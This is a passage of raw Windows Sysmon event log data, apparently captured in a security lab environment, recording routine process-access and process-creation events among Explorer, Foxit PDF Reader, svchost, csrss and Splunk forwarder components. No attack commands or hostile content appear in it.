Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C31F44A71C9CA839FE385CC55CDD63E,SHA256=1837D1B980C32AF892FCE26FFBE57C53A252E9E33F22AC2888ECABEBE9C8521B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000040554Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:29.147{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEFEAE5)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+11214|C:\Windows\System32\wow64win.dll+31ed0|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+363dd|C:\Windows\SYSTEM32\ntdll.dll+a9834|C:\Windows\System32\wow64win.dll+f534|C:\Windows\System32\wow64win.dll+4e07 10341000x800000000000000040553Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:29.146{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1301b1(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\System32\SHELL32.dll+109200(wow64)|C:\Windows\System32\SHELL32.dll+109136(wow64)|C:\Windows\System32\SHELL32.dll+1092c2(wow64)|C:\Windows\system32\explorerframe.dll+4b1ba(wow64)|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+d30a(wow64) 10341000x800000000000000040552Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:29.146{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+13012a(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\System32\SHELL32.dll+109200(wow64)|C:\Windows\System32\SHELL32.dll+109136(wow64)|C:\Windows\System32\SHELL32.dll+1092c2(wow64)|C:\Windows\system32\explorerframe.dll+4b1ba(wow64)|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+d30a(wow64) 10341000x800000000000000040551Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:29.146{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+130113(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\System32\SHELL32.dll+109200(wow64)|C:\Windows\System32\SHELL32.dll+109136(wow64) 10341000x800000000000000040550Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:29.146{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+130113(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\System32\SHELL32.dll+109200(wow64)|C:\Windows\System32\SHELL32.dll+109136(wow64)|C:\Windows\System32\SHELL32.dll+1092c2(wow64) 10341000x800000000000000040549Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:29.115{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E395-63C7-0B06-00000000AF02}5252C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040548Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:29.099{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040547Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:29.099{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040546Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:29.099{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040545Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:29.099{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040544Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:29.099{FE4C2B44-D9F3-63C7-0500-00000000AF02}4082524C:\Windows\system32\csrss.exe{FE4C2B44-E395-63C7-0B06-00000000AF02}5252C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000040543Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:29.099{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E395-63C7-0B06-00000000AF02}5252C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000040542Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:29.100{FE4C2B44-E395-63C7-0B06-00000000AF02}5252C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000015489Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:29.208{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E395-63C7-E701-00000000B002}1540C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015488Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:29.208{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015487Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:29.208{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015486Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:29.208{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015485Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:29.208{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015484Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:29.208{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015483Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:29.208{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015482Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:29.208{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015481Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:29.208{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015480Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:29.208{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015479Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:29.208{E5A8D418-DC43-63C7-0500-00000000B002}416532C:\Windows\system32\csrss.exe{E5A8D418-E395-63C7-E701-00000000B002}1540C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000015478Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:29.208{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E395-63C7-E701-00000000B002}1540C:\Program 